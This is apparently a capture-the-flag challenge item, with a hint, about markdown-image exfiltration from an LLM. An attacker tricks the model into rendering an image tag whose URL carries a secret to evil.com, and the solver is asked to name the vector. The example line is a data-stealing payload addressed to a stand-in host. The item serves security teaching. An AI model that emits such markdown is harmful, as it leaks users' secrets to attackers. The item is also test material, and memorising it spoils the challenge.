Markdown Exfiltration

Hard200 pts0 solves
An attacker tricks an LLM into rendering: ![](https://evil.com/steal?data=SECRET) The browser GETs the URL with stolen data. What is the exfiltration vector? Flag format: CONGRESS{[vector_description]} Example: CONGRESS{hidden_iframe_redirect}
Hint
The markdown image tag makes the browser fetch a URL that contains the secret as a parameter.